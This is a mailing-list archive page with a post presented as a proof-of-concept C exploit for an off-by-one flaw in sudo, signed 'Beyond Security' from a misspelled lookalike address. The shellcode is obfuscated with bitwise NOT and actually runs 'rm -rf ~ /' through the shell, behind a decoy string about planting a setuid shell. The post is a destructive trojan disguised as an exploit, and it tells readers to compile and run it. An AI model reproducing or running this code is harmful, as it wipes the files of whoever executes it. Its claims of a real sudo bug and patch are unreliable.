Full Disclosure mailing list archives
[Beyond Security] New sudo off-by-one poc exploit.
From: Beyond Security <beyondsequritee () yahoo com>
Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
/* * off by one ebp overwrite in sudo prompt parsing function * discovered by beyond security in 2007, thx ge * * to compile: gcc -pipe -o sobo sobo.c ; ./sobo * * please use responsibly! a patch has already been sent * upstream and a fix will be included in the next sudo release * */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <alloca.h> #define SPROMPT "%u@%h> \\%" #define shellcode esp #define RETS_NUM 246 #define NOPS_NUM 116 char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"; void fill (char *buff, int size, unsigned long val) { unsigned long *ptr = (unsigned long *) buff; for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val; } unsigned long get_sp (void) { __asm__ ("lea esp, %eax"); } char *exp (char nops_nums, char rets_nums, char *shellcode) { int size = strlen (SPROMPT) + nops_nums + rets_nums + strlen (shellcode); unsigned char *nops = alloca (nops_nums); unsigned char *rets = alloca (rets_nums); unsigned long ret = get_sp (); static char exp_buffer [8192]; /* ensure isatty() fails */ close (0); close (1); close (2); fill (nops, (unsigned char) nops_nums, 0x90909090); fill (rets, (unsigned char) rets_nums, ret); if (size > sizeof (exp_buffer)) { fprintf (stderr, "buffer is too small\n"); return NULL; } snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s", SPROMPT, nops, shellcode, rets); return exp_buffer; } int main(int argv, char *argc[]) { char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode); execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL); /* shellroot should await you @ "HISTFILE=/dev/null /tmp/.beyond -p" */ return 0; } ____________________________________________________________________________________ Got a little couch potato? Check out fun summer activities for kids. http://search.yahoo.com/search?fr=oni_on_mail&p=summer+activities+for+kids&cs=bz ____________________________________________________________________________________ Looking for a deal? Find great prices on flights and hotels with Yahoo! FareChase. http://farechase.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [Beyond Security] New sudo off-by-one poc exploit. Beyond Security (Aug 06)
- Re: [Beyond Security] New sudo off-by-one poc exploit. Andrew Farmer (Aug 06)